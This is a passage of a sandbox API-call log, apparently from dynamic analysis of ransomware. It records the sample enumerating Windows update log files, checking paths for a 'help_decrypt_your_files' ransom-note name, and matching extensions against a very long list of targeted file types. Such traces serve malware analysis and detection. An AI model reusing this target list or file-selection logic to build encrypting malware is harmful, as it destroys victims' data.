r6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.198] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf98df460, ftLastAccessTime.dwHighDateTime=0x1d705ef, ftLastWriteTime.dwLowDateTime=0x22721e58, ftLastWriteTime.dwHighDateTime=0x1d705f0, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.009.etl", cAlternateFileName="UPFC55~1.ETL")) returned 1
	[0179.198] lstrcmpW (lpString1="UpdateSessionOrchestration.009.etl", lpString2="..") returned 1
	[0179.199] lstrcmpW (lpString1="UpdateSessionOrchestration.009.etl", lpString2=".") returned 1
	[0179.199] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.199] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.009.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl"
	[0179.199] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl") returned 68
	[0179.199] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.199] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.009.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl") returned 0x44
	[0179.199] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.199] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.199] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl"
	[0179.200] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.009.etl") returned 68
	[0179.200] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.200] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.200] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.200] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.200] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.201] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x6fb852ed, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xa05d916a, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.010.etl", cAlternateFileName="UPB13B~1.ETL")) returned 1
	[0179.201] lstrcmpW (lpString1="UpdateSessionOrchestration.010.etl", lpString2="..") returned 1
	[0179.201] lstrcmpW (lpString1="UpdateSessionOrchestration.010.etl", lpString2=".") returned 1
	[0179.201] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.201] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.010.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl"
	[0179.201] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl") returned 68
	[0179.201] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.201] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.010.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl") returned 0x44
	[0179.201] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.202] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.202] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl"
	[0179.202] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.010.etl") returned 68
	[0179.202] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.202] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.202] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.203] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.203] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0179.203] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x46a3d34f, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6df6574e, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateSessionOrchestration.011.etl", cAlternateFileName="UP076F~1.ETL")) returned 1
	[0179.203] lstrcmpW (lpString1="UpdateSessionOrchestration.011.etl", lpString2="..") returned 1
	[0179.203] lstrcmpW (lpString1="UpdateSessionOrchestration.011.etl", lpString2=".") returned 1
	[0179.203] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\") returned="C:\\Users\\All Users\\USOShared\\Logs\\"
	[0179.203] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\", lpString2="UpdateSessionOrchestration.011.etl" | out: lpString1="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl") returned="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl"
	[0179.203] lstrlenW (lpString="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl") returned 68
	[0179.203] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0179.204] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.011.etl", cchLength=0x44 | out: lpsz="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl") returned 0x44
	[0179.204] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.204] StrStrW (lpFirst="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl", lpSrch="help_decrypt_your_files") returned 0x0
	[0179.204] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl" | out: lpString1="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl") returned="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl"
	[0179.204] lstrlenW (lpString="c:\\users\\all users\\usoshared\\logs\\updatesessionorchestration.011.etl") returned 68
	[0179.206] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0179.206] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.206] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0179.206] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0179.207] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.m